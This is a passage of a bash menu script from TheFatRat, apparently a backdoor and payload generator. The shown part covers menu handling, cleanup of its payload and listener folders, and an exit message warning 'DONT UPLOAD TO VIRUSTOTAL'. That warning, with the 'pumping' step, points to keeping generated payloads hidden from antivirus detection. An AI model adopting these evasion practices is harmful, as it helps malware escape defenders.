2>&1 - echo - echo -ne $yellow" Finished Pumping ... " - read oke - menu - - elif test $fatrat == '13' - then - echo "" - confdefault - clear - menu - - elif test $fatrat == '14' - then - echo "" - echo -ne $red" [>] $cyan Are you sure you want to clean payload folders? [y/N] : " - read clean - if [ $clean == "n" ] ; - then - clear - menu - else - echo -ne $red"\n [*] $cyan Cleaning $path/temp/ \n" - rm $path/temp/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $path/autorun/ " - rm $path/autorun/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $output/ " - rm $output/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $path/config/listeners/ " - rm $path/config/listeners/* >/dev/null 2>&1 - sleep 2 - echo "" - echo -e $red" [*] $cyan Cleaning $path/*.exe or apk" - rm *.exe *.apk >/dev/null 2>&1 - sleep 2 - echo "" - echo -ne $red" [*] $cyan Folders cleaned, press [ENTER] key to return to the main menu." - read anjeng - menu - fi - elif test $fatrat == '15' - then - firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md - clear - menu - - elif test $fatrat == '16' - then - credits - - elif test $fatrat == '17' - then - Stop - echo "" - echo -e $okegreen" REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!" - echo "" - read -p " Press [Enter] key to Exit..." - sleep 2 - clear - exit - else - clear - menu - -fi